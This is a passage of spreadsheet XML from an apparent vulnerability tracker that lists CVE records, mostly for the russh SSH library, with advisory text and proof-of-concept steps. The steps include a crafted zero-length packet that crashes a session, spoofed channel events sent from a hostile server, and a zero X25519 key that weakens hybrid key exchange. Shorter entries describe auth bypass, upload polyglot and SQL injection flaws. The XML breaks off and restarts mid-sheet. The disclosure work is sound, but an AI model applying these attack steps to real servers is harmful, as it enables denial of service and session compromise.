Negotiation gap: `negotiation.rs`'s `Select` MAC-selection logic only special-cases `needs_mac()` when negotiation would otherwise *fail* (no common MAC), substituting `none` only if the cipher does not need one. It never re-validates the case where `none` is a common/successfully-negotiated MAC on both sides regardless of what the chosen cipher requires. So an application (or a malicious peer, since negotiation is attacker-influenced on one side) that includes `none` in its own preferred MAC list — while still allowing the default CTR/CBC cipher suite — ends up with an invalid, panic-inducing combination that the library itself should refuse.
### PoC
1. Configure one side's `Preferred` config to include `mac::NONE` in the MAC list (this is a supported, non-default configuration exposed by the crate's public `Preferred` API — used e.g. for legacy/interop compatibility), while leaving the default cipher list (which includes `aes256-ctr`/`aes256-cbc`) untouched.
2. Complete a normal key exchange; negotiation lands on `{cipher: aes*-ctr (or -cbc), mac: none}` because `none` is present and preferred/common on both sides, and nothing during negotiation rejects this pairing.
3. From the peer, send one transport packet whose decrypted packet-length field is `0` (trivial to construct once the session keys are known to that peer, or for the peer that legitimately owns the connection to simply hand-craft, e.g. a modified client for testing).
4. `cipher::read()` on the receiving side panics: `range start index 16 out of range for slice of length 4`.
5. Because each connection is handled in its own `tokio::spawn`'ed task (see the per-connection `select!` loop that calls into `cipher::read()`), the panic unwinds only that task by default, but it unconditionally terminates that SSH connection/session — a working, currently-unauthenticated, already-established connection is killed with no attacker interaction beyond the one crafted packet, and the check runs on every inbound packet including pre-auth ones.
### Impact
Denial of service: a remote peer that can influence MAC preference negotiation (or a MITM in possession of the session key) can crash any individual SSH connection/session that ends up negotiating a block cipher together with `mac=none`, with a single crafted packet, pre-authentication. This does not affect the process as a whole (panic is scoped to that connection's task under `panic=unwind`), and does require a non-default configuration that permits `none` as a preferred MAC — hence Low severity.
### Suggested fix
In the MAC-selection logic in `negotiation.rs`, reject (or force substitution of) `mac::NONE` whenever the negotiated cipher's `needs_mac()` is `true`, regardless of *how* `none` came to be selected — not only in the "no common MAC" fallback branch. Defensively, `cipher::read()` could also refuse to shrink a buffer below the number of bytes already consumed for the length-field block, returning a protocol error instead of resizing blindly.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102822</t>
        </is>
      </c>
    </row>
    <row r="865">
      <c r="A865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B865" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102823</t>
        </is>
      </c>
      <c r="D865" s="5" t="inlineStr"/>
      <c r="E865" s="5" t="inlineStr"/>
      <c r="F865" s="5" t="inlineStr"/>
      <c r="G865" s="5" t="inlineStr"/>
      <c r="H865" s="5" t="inlineStr"/>
      <c r="I865" s="5" t="inlineStr"/>
      <c r="J865" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K865" s="5" t="inlineStr"/>
      <c r="L865" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M865" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N865" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O865" s="5" t="inlineStr"/>
      <c r="P865" s="5" t="inlineStr"/>
      <c r="Q865" s="5" t="inlineStr"/>
      <c r="R865" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S865" s="5" t="inlineStr">
        <is>
          <t>### Summary
CVE-2026-68930 was fixed by adding `Session::is_established_channel()` in `russh/src/server/encrypted.rs`, which gates every channel-scoped SERVER-side message (CHANNEL_REQUEST, CHANNEL_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_WINDOW_ADJUST, CHANNEL_EXTENDED_DATA) on `enc.channels.get(&amp;channel).is_some_and(|c| c.confirmed)` before invoking any `Handler` callback. The identical validation was never added to the CLIENT side (`russh/src/client/encrypted.rs`), which processes channel-scoped messages sent by the SSH SERVER once the client has authenticated.
### Details
In `client_read_authenticated` (`russh/src/client/encrypted.rs`, ~lines 431-757), for CHANNEL_DATA, CHANNEL_EXTENDED_DATA, CHANNEL_EOF, CHANNEL_CLOSE, CHANNEL_OPEN_FAILURE, CHANNEL_SUCCESS, CHANNEL_FAILURE, and the CHANNEL_REQUEST sub-types exit-status/exit-signal/xon-xoff, the code only optionally forwards the event to the internal per-channel mpsc sender via `if let Some(chan) = self.channels.get(&amp;channel_num) { ... }` (a no-op if the channel is unknown), but then **unconditionally** calls the corresponding public `Handler` trait method (`client.data(...)`, `client.exit_status(...)`, `client.channel_close(...)`, `client.channel_success(...)`, etc.) regardless of whether `channel_num` corresponds to any channel the client ever opened or that was ever confirmed. Only CHANNEL_OPEN_CONFIRMATION (closes the connection with `Error::Inconsistent` if unknown) and CHANNEL_WINDOW_ADJUST (returns early with `Ok(())` if unknown) correctly validate channel existence before acting.
Corroborating evidence this check was intended but never wired up: `crate::Error` defines a dedicated `WrongChannel` variant documented as "Message received/sent on unopened channel" (`russh/src/lib_inner.rs`, ~line 144-146), yet a repo-wide search shows this variant is never constructed or returned anywhere in the codebase — dead code left over from (or intended for) exactly this validation.
Because `Session::new_channel_id()` (`russh/src/session.rs`, ~line 708) allocates channel IDs sequentially starting at 1, a malicious or compromised SSH server can trivially predict the ID of the client's next channel and inject spoofed lifecycle events for it before or interleaved with the real channel-open exchange, or replay events for already-closed channel IDs.
### PoC
Many real-world consumers of russh-as-a-client (deployment/orchestration tools, CI runners connecting to build/bastion hosts, git-over-ssh style tooling, database/tunnel clients) implement the `client::Handler` trait directly and key their own state (e.g. `HashMap&lt;ChannelId, CommandState&gt;`, exit-code trackers, per-channel byte counters, completion futures) off the channel IDs the library hands them, trusting the documented contract that events like "The remote process has exited" (`exit_status`) or "Called when the server closes a channel" (`channel_close`) only fire for a channel the application itself opened.
A malicious, MITM'd (via a compromised/rogue jump host the client is configured to trust), or simply hostile SSH server can send `SSH_MSG_CHANNEL_REQUEST` (exit-status/exit-signal), `SSH_MSG_CHANNEL_DATA`, `SSH_MSG_CHANNEL_CLOSE`, `SSH_MSG_CHANNEL_SUCCESS`/`FAILURE`, or `SSH_MSG_CHANNEL_OPEN_FAILURE` for an arbitrary/predicted/never-opened channel ID at any point after authentication completes. Because the library invokes the `Handler` callback unconditionally, this reaches application code with an ID it never registered.
### Impact
(1) A reliable, purely protocol-level trigger for an application panic/DoS in any client that indexes per-channel state by `ChannelId` without itself re-checking channel validity — the exact class of bug CVE-2026-68930 fixed server-side; and (2) lets the server spoof exit-status/exit-signal/close/success/failure notifications for a channel the client has not yet opened or has already released, desynchronizing the client's command-completion bookkeeping (e.g. reporting a forged exit code 0 for a not-yet-run remote command, or a premature `channel_close` before real output/exit-status has arrived) — a business-logic-level integrity violation of the SSH channel lifecycle that automation built on russh implicitly relies on.
Suggested fix: add the same `is_established_channel()`-style gate already used in `server/encrypted.rs` to `client/encrypted.rs`'s `client_read_authenticated`, checking `self.channels.get(&amp;channel_num)` before invoking any `Handler` callback (not just the mpsc forward), for every channel-scoped message type.
For credit/changelog purposes, please use: Yazan Balawneh, Cystack.ps</t>
        </is>
      </c>
      <c r="T865" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102823</t>
        </is>
      </c>
    </row>
    <row r="866">
      <c r="A866" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B866" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C866" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102824</t>
        </is>
      </c>
      <c r="D866" s="5" t="inlineStr"/>
      <c r="E866" s="5" t="inlineStr"/>
      <c r="F866" s="5" t="inlineStr"/>
      <c r="G866" s="5" t="inlineStr"/>
      <c r="H866" s="5" t="inlineStr"/>
      <c r="I866" s="5" t="inlineStr"/>
      <c r="J866" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K866" s="5" t="inlineStr"/>
      <c r="L866" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M866" s="5" t="inlineStr">
        <is>
          <t>0.63.0</t>
        </is>
      </c>
      <c r="N866" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O866" s="5" t="inlineStr"/>
      <c r="P866" s="5" t="inlineStr"/>
      <c r="Q866" s="5" t="inlineStr"/>
      <c r="R866" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="S866" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
The hybrid ML-KEM 768 + X25519 key exchange implementation in `russh/src/kex/hybrid_mlkem.rs` does not validate that the remote peer's X25519 public key is not the zero point (all-zero 32-byte value). This allows a remote peer to force the X25519 contribution to the combined shared secret to zero, reducing the hybrid KEX to a single-algorithm exchange.
Affected code at HEAD (v0.62.4, commit 0089c89):
**Server-side** (`server_dh`, lines 92-93):
```rust
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = s_secret * c_pk1;
```
**Client-side** (`compute_shared_secret`, lines 154-155):
```rust
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
// No zero-point check - proceeds to: let k_cl = x25519_secret * s_pk1;
```
## Root Cause
Commit a7fc1eb (2026-07-22, "fix mpint encoding and validate curve25519 keys") added zero-point validation to the standalone Curve25519 KEX in `russh/src/kex/curve25519.rs` at two locations:
- `server_dh` line 77: `if client_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
- `compute_shared_secret` line 122: `if remote_pubkey.0 == [0u8; 32] { return Err(crate::Error::Kex); }`
The same X25519 scalar multiplication pattern appears in `hybrid_mlkem.rs`, but the fix was not applied there.
## Proof of Concept
A malicious SSH client negotiating `mlkem768x25519-sha256` can send a KEX_HYBRID_INIT message containing a valid ML-KEM 768 encapsulation key followed by 32 zero bytes as the X25519 component.
When the server computes `k_cl = s_secret * c_pk1`, the result is the zero point regardless of the server's secret scalar. The combined shared secret `K = SHA-256(k_pq || k_cl)` then depends only on the ML-KEM component. The same attack works in reverse against a client connecting to a malicious server.
The zero X25519 public key passes all existing validation (the length check on line 78 succeeds since 32 bytes is correct). No panic or crash occurs - the exchange completes successfully with a weakened shared secret.
## Impact
The purpose of hybrid key exchange is defense-in-depth: if either the classical algorithm (X25519) or the post-quantum algorithm (ML-KEM 768) is broken, the combined secret remains secure. By injecting a zero X25519 public key, an attacker eliminates the classical contribution entirely, reducing security to depend solely on ML-KEM.
This matters in two scenarios:
1. If ML-KEM 768 is later found to have a weakness (the explicit threat model hybrid KEX is designed to mitigate), sessions where the X25519 component was zeroed out lose their fallback protection.
2. An active network attacker who can intercept KEX could downgrade the hybrid exchange to effectively single-algorithm security without either peer detecting it.
The severity is MEDIUM rather than HIGH because the ML-KEM component still provides strong security today, and an active attacker who can modify KEX messages can already perform other attacks unless strict KEX is negotiated.
## Suggested Fix
Add zero-point checks in `hybrid_mlkem.rs` matching the ones in `curve25519.rs`:
```rust
// In server_dh, after line 93:
let mut c_pk1 = MontgomeryPoint([0; 32]);
c_pk1.0.copy_from_slice(c_pk1_bytes);
if c_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
// In compute_shared_secret, after line 155:
let mut s_pk1 = MontgomeryPoint([0; 32]);
s_pk1.0.copy_from_slice(s_pk1_bytes);
if s_pk1.0 == [0u8; 32] {
    return Err(Error::Kex);
}
```
Ideally, also validate against the other small-subgroup points on Curve25519 (there are a small number of low-order points that also yield a zero shared secret), matching the comprehensive validation OpenSSH performs.
### AI tooling
AI assistancewas used for the code audit and for drafting this report. The finding was manually verified against the project's source at the location cited above before reporting it, and the severity and impact assessment are my own.</t>
        </is>
      </c>
      <c r="T866" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102824</t>
        </is>
      </c>
    </row>
    <row r="867">
      <c r="A867" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B867" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C867" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102825</t>
        </is>
      </c>
      <c r="D867" s="5" t="inlineStr"/>
      <c r="E867" s="5" t="inlineStr"/>
      <c r="F867" s="5" t="inlineStr"/>
      <c r="G867" s="5" t="inlineStr"/>
      <c r="H867" s="5" t="inlineStr"/>
      <c r="I867" s="5" t="inlineStr"/>
      <c r="J867" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K867" s="5" t="inlineStr"/>
      <c r="L867" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M867" s="5" t="inlineStr">
        <is>
          <t>0.62.6</t>
        </is>
      </c>
      <c r="N867" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O867" s="5" t="inlineStr"/>
      <c r="P867" s="5" t="inlineStr"/>
      <c r="Q867" s="5" t="inlineStr"/>
      <c r="R867" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S867" s="5" t="inlineStr">
        <is>
          <t>### Details
#### Affected versions and vulnerable location
- Confirmed present on default branch `main` at HEAD `0089c89c94753bebbec12b956c07a1cd38740379`.
- Crate version at HEAD: `0.62.4`.
- Vulnerable locations on current default branch:
  - `russh/src/server/mod.rs:91` (`pub max_auth_attempts: usize`)
  - `russh/src/server/mod.rs:121` (default `max_auth_attempts: 10`)
  - `russh/src/server/encrypted.rs:89` (`USERAUTH_REQUEST` dispatch into auth handler path)
  - `russh/src/server/encrypted.rs:98` (`self.common.auth_attempts += 1`)
  - `russh/src/server/encrypted.rs:53` (only runtime read of `auth_attempts`, used for initial reject timing, not attempt limiting)
- Default-branch history check did not show a newer merged commit adding enforcement against `config.max_auth_attempts`.
#### Reachability trace verified
1. Entry point: exported server API `server::run_stream` in `russh/src/server/mod.rs:1049`.
2. Session run loop in `russh/src/server/session.rs` processes incoming packets and calls `reply(...)` (`server/session.rs:725`).
3. `reply` forwards encrypted packets to `session.server_read_encrypted(...)` (`server/mod.rs:1221`).
4. `server_read_encrypted` routes `USERAUTH_REQUEST` to `enc.server_read_auth_request(...)` (`server/encrypted.rs:89`).
5. On each request, `self.common.auth_attempts += 1` executes (`server/encrypted.rs:98`).
6. No comparison against `self.common.config.max_auth_attempts` is present in this runtime flow.
### PoC
#### Reproduction steps and observed output
I did not run a full server process in this environment because Rust tooling is unavailable. I verified the issue from source and command output on the audited tree.
1. Show where `max_auth_attempts` appears:
```bash
rtk rg -n "max_auth_attempts" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/encrypted.rs .scratch/russh/russh/src/server/session.rs
```
Observed:
```text
.scratch/russh/russh/src/server/mod.rs:91:    pub max_auth_attempts: usize,
.scratch/russh/russh/src/server/mod.rs:121:            max_auth_attempts: 10,
.scratch/russh/russh/src/server/mod.rs:148:            .field("max_auth_attempts", &amp;self.max_auth_attempts)
```
2. Show runtime auth-attempt handling:
```bash
rtk rg -n "auth_attempts == 0|auth_attempts \\+= 1" .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
53:        let initial_none_rejection_wait_until = if self.common.auth_attempts == 0 {
98:                self.common.auth_attempts += 1;
```
3. Show production entrypoint-to-auth path references:
```bash
rtk rg -n "pub async fn run_stream|match reply\\(|server_read_encrypted\\(|server_read_auth_request\\(" .scratch/russh/russh/src/server/mod.rs .scratch/russh/russh/src/server/session.rs .scratch/russh/russh/src/server/encrypted.rs
```
Observed:
```text
.scratch/russh/russh/src/server/encrypted.rs:89:                enc.server_read_auth_request(
.scratch/russh/russh/src/server/session.rs:725:                            match reply(&amp;mut self, &amp;mut handler, &amp;mut pkt).await {
.scratch/russh/russh/src/server/mod.rs:1049:pub async fn run_stream&lt;H, R&gt;(
.scratch/russh/russh/src/server/mod.rs:1221:    session.server_read_encrypted(handler, pkt).await
```
4. Toolchain check:
```bash
cargo --version
```
Observed:
```text
/bin/bash: line 1: cargo: command not found
```
### Impact
#### Attacker model
- Attacker: unauthenticated remote client with TCP reachability to a russh-backed SSH service.
- Preconditions: deployer expects `server::Config.max_auth_attempts` to cap attempts.
- Impact: repeated `USERAUTH_REQUEST` attempts continue for a single connection beyond configured limit, increasing online guessing opportunity and backend auth workload.
### Suggested fix
Enforce `max_auth_attempts` in the `USERAUTH_REQUEST` branch before invoking auth-method handlers, and fail closed once threshold is reached.
Concrete patch direction in `russh/src/server/encrypted.rs`:
```rust
if self.common.config.max_auth_attempts &gt; 0
    &amp;&amp; self.common.auth_attempts &gt;= self.common.config.max_auth_attempts
{
    self.common.disconnect(
        Disconnect::NoMoreAuthMethodsAvailable,
        "Too many authentication attempts",
        "",
    )?;
    return Ok(());
}
```
### How it was found and a note on tooling
The researcher synthesized three lens outputs, then revalidated each claim against current `main`: source presence and commit history, advisory overlap checks in both GitHub advisories and OSV, entrypoint-to-sink reachability, attacker-model realism, and execution-claim integrity. The researcher used `gh`, `git`, `rg`, and direct source inspection under `.scratch/russh`. Because Rust tooling is unavailable in this worker, this report is intentionally marked `source-only`.
AI assistance was used while investigating this and while drafting this report. The finding was verified by reading the cited code at HEAD. The vulnerability was not executed it, and that limit is stated plainly above rather than left implied.
Credits: arpitjain099.</t>
        </is>
      </c>
      <c r="T867" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102825</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T867"/>
  <conditionalFormatting sqref="E2:E86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86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CVE-2026-76504</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:catalyst_sd-wan_manager</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-10-03</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-177</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the API session-based authentication management of Cisco Catalyst SD-WAN Manager could allow an unauthenticated, remote attacker to access an affected system with privileges of the admin user.
This vulnerability is due to improper handling of URI encoding in an HTTP request, which allows the request to bypass an authentication rule that is intended to restrict access to a specific API endpoint. An attacker could exploit this vulnerability by sending a crafted HTTP request to the API of the affected system. A successful exploit could allow the attacker to bypass authentication and gain access to the API as the admin user.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76504</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102427</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr"/>
      <c r="H3" s="5" t="inlineStr"/>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr"/>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S3" s="5"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the uploaded file’s content with a real magic-byte MIME check, but the extension allow-list that would otherwise restrict the saved file’s extension was present in the source and commented out. The saved file’s extension was taken directly from the attacker-supplied filename with no validation, and the file was written to a path directly under the Joomla web root that is executed by the PHP handler. An image/PHP polyglot, a file whose header bytes satisfy the MIME check with PHP source appended after, passed the content check while carrying a .php extension of the attacker’s choosing.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102427</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55107</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Kobako is a Ruby gem that embeds a Wasm-isolated mruby interpreter inside applications, allowing execution of untrusted Ruby scripts (LLM-generated code, user formulas, student submissions, third-party plugins) in-process without giving them access to host memory, files, network, or credentials. From version 0.1.0 to before version 0.9.1, a guest mruby script running inside the Kobako sandbox can execute arbitrary Ruby in the host process, fully escaping the sandbox. This issue has been patched in version 0.9.1.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55107</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76570</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomcode.com - Unauthenticated SQL injection in read and write queries in JCTables  1.21.1 - The front-end CRUD API controller performs no Joomla token validation and no authentication check on any task. Table names, column names, and values are taken directly from request parameters and concatenated into SQL queries, allowing SQLi for reading and writing queries.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76570</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96349</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in SiteSkite &lt;= 2.1.8 versions.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96349</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100512</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Contributor PHP Object Injection in Nested Pages &lt;= 3.3.2 versions.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100512</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102115</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
